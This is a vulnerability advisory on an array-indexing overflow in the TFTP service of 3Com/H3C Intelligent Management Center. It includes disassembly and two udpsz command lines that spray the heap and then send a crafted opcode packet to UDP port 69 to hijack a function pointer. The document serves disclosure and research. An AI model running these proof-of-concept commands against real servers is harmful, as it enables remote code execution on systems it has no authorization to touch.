####################################################################### Luigi Auriemma Application: 3com / H3C Intelligent Management Center (IMC) http://www.3com.com/IMC_Enterprise/ Versions: <= 3.3 SP2 R2606P13 Platforms: Windows, Linux, Solaris Bug: array indexing overflow in tftpserver.exe Exploitation: remote, versus server Date: probably found 19 Oct 2010 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== "3ComŽ Intelligent Management Center (IMC) Enterprise Edition is a self-contained comprehensive management solution, flexible and scalable enough to meet the needs of advanced Enterprise networks." The suite is also known under the vendors HP and H3C (the original developer). ####################################################################### ====== 2) Bug ====== tftserver.exe is a TFTP service running on UDP port 69 and available in the default configuration of IMC. The service is affected by an array indexing overflow in the function that selects the address of the function to execute for handling the specific opcode of the packet. The opcode is a 16bit number and the memory where it's taken the function pointer is a heap dynamically allocated memory (it increases with the time and the connections) that the attacker can "spray" with his data through the sending of various packets before the one used for exploiting the bug and allowing him to execute code: 00404F74 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] <= EDX is the 16bit opcode 00404F76 |. 8B4491 FC MOV EAX,DWORD PTR DS:[ECX+EDX*4-4] ... 00402847 |. 8B16 MOV EDX,DWORD PTR DS:[ESI] <= ESI controlled 00402849 |. 8B52 04 MOV EDX,DWORD PTR DS:[EDX+4] 0040284C |. 8D85 90FDFFFF LEA EAX,DWORD PTR SS:[EBP-270] 00402852 |. 50 PUSH EAX 00402853 |. 51 PUSH ECX 00402854 |. 57 PUSH EDI 00402855 |. 8BCE MOV ECX,ESI 00402857 |. C645 FC 01 MOV BYTE PTR SS:[EBP-4],1 0040285B |. FFD2 CALL EDX ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip udpsz -x 4 -l 10 -C "0003 00 00" -b 0x61 SERVER 69 500 udpsz -C "0100 00 00" -b 0x61 SERVER 69 1024 the index 0x0100 is only an example. note that the function 00401380 takes the 16bit opcode from the packet in a "signed" way so if the lower 8bit value of the opcode is major than 0x80 it's needed to add 0x0100 to the desired opcode (for example 0xcb88 is read by the service as 0xca88 and 0xcb78 is read correctly). ####################################################################### ====== 4) Fix ====== http://www.zerodayinitiative.com/advisories/ZDI-11-165 #######################################################################